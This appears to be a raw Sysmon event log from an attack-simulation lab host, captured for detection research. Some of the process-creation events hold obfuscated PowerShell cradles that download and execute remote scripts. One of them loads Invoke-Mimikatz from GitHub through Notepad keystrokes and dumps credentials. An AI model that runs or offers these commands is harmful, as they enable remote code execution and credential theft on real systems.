16:56:23.639{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f535de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4ac19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4e1471(wow64) 154100x80000000000000002244013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.652{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002244012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.639{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-02 16:56:11.776 11241100x80000000000000002244011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.639{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-02 16:56:11.773 23542300x80000000000000002244010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.608{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=41DEB5C2068B3C707A43E1C7B984722A,SHA256=6C05AA34DB8C5D321BE87D6C650726F5177C9D2B475E8846E1745738F3F8A8A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.563{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=3C0D9681A001E394FB5A1D799195BF3C,SHA256=B0C833077DCAD54DAFAF461E4F34FD1A18A43FF8DE989F07E9A9359BF07224C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.498{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002244039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:24.920{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-01 22:53:33.433 23542300x80000000000000002244038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:24.920{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:24.748{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B1A39F9366275C61E3F365B12B59573,SHA256=60C2721C485D15D9DB564386C2AEC11C04412AF3397BCC75CB16B297C90B5BE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:24.514{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3AEF92CA8B01C7A806EB5E03D0326610,SHA256=3D50E3D7F5C87E8BC93D4501C9315133E2CF1FD74BF5E7A1AF4621E347B293BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:24.498{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-2299-6039-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000002244034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:24.295{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D33BBC867A8DC512BF086C1A561CE67,SHA256=AC770A9C98D170A7A987DC91DEEDD0747B7B582AE5923B970075CEECB7257663,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.975{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002244069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.975{05ADC7E1-6E39-603E-FBAA-00000000AD01}467613660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\wshom.ocx+b37c|C:\Windows\System32\wshom.ocx+b828|C:\Windows\System32\OLEAUT32.dll+2309f|C:\Windows\System32\OLEAUT32.dll+c2e5|C:\Windows\System32\OLEAUT32.dll+c836|C:\Windows\System32\wshom.ocx+cef3|C:\Windows\System32\wshom.ocx+8f8d|UNKNOWN(00007FF829944621) 154100x80000000000000002244068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.984{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\System32\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXENotepadC:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=BA78FCF8CA9D806C6C047357E31748DE,SHA256=34A07759492E31AEC2A009505FE8DFB50242375C4308AD4657B2872F4F75A077,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr} 23542300x80000000000000002244067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.920{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DEE1AA02C0DE0CCDF13FCFE29AE4768,SHA256=ACBECF0BD2BE7BE5AE7CA3AA90A01F4B267674D215E609EB5074411968C9658F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.775{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.775{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.733{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.733{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002244062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:56:25.701{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676\PSHost.132591777856121033.4676.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002244061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.686{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_5erjjvgt.fpz.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.686{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_2uqapaiu.1ek.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002244059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.675{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_2uqapaiu.1ek.ps12021-03-02 16:56:25.675 10341000x80000000000000002244058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.655{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 